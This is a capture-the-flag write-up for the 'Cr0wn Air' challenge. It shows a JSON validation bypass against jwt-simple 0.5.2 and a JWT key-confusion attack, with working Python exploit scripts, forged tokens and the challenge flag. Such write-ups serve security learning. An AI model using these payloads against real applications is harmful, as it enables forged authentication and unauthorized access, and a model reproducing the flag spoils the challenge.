Cr0wn Air

There are two vulns here: a bypass of the JSON validation, and a JWT signing vulnerability.

The first part is pretty simple. The app uses `"jwt-simple": "0.5.2"`, which has a vulnerability allowing us to bypass the pattern validation, so we can obtain a JWT for a 'low privilege' user:

```python
import requests

url = "<TARGET_URL>/"  # placeholder: the challenge's base URL (not given on the page)

r = requests.post(url + "checkin", json={
    "firstName": "a",
    "lastName": "b",
    "passport": "123456789",
    "ffp": "CA12345678",
    "extras": {"sssr": {"sssr": "FQTU"}, "constructor": {"name": "Array"}},
})
```

The JWT library is vulnerable to tokens being signed as HMAC with the public key, a common vuln. However, we have no pubkey. I was stuck for ages, until I spotted (thanks Makelaris) https://blog.silentsignal.eu/2021/02/08/abusing-jwt-public-keys-without-the-public-key/

This provided a Docker image where I could simply provide two JWTs, modify the payload in the program and run it. It pulled out the parameters and generated 4 potential public keys, signing my data with each. Using this:

```python
import requests

url = "<TARGET_URL>/"  # placeholder: the challenge's base URL (not given on the page)

# One token per candidate public key produced by the tool; only the one signed
# with the real key will be accepted by the server.
jwts = [
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdGF0dXMiOiAiZ29sZCIsICJmZnAiOiAiQ0ExMjM0NTY3OCJ9.6ZtpFu7jGB-EM7A2L00u3iAo8qtBKHDUzVcg-Aop5Y",
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdGF0dXMiOiAiZ29sZCIsICJmZnAiOiAiQ0ExMjM0NTY3OCJ9.eVHOVf5VHN8Qjxs0da8OtqtGmbRJ7Rs4BV7EL-fknMs",
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdGF0dXMiOiAiZ29sZCIsICJmZnAiOiAiQ0ExMjM0NTY3OCJ9.yncoTDoKFPcSA90PBqPayLUnDhoBEIQay4A6p0tD8z8",
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdGF0dXMiOiAiZ29sZCIsICJmZnAiOiAiQ0ExMjM0NTY3OCJ9.cLVShR2bijq_NZGU4xT5wv938aaGsKW9At2TYb2-lk8",
]

for j in jwts:
    r = requests.post(url + "upgrades/flag", headers={"Authorization": f"Bearer {j}"})
    print(r.text)
```

We get the flag:

union{I_<3_JS0N_4nD_th1ngs_wr4pp3d_in_JS0N}
